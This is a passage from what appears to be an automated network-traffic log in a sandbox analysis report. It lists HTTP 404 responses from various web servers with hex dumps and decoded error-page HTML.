2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:30 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:30 GMTServer: ApacheVary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 30 62 0d 0a 61 64 6d 69 6e 40 70 66 70 72 6f 6a 65 6b 74 2e 73 6b 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 33 0d 0a 61 64 6d 69 6e 40 70 66 70 72 6f 6a 65 6b 74 2e 73 6b 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0d 0a 31 31 0d 0a 0a 3c
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:30 GMTServer: ApacheVary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 30 62 0d 0a 61 64 6d 69 6e 40 70 66 70 72 6f 6a 65 6b 74 2e 73 6b 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 33 0d 0a 61 64 6d 69 6e 40 70 66 70 72 6f 6a 65 6b 74 2e 73 6b 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0d 0a 31 31 0d 0a 0a 3c
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:30 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:30 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:30 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:30 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:30 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-53.ec2.internalX-Request-Id: 76ed3713-a443-421e-b0cc-7a65d45fe40cData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:31 GMTContent-Type: text/htmlContent-Length: 867Connection: keep-aliveServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesExpires: Sat, 02 Dec 2023 01:09:39 GMTAge: 2Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 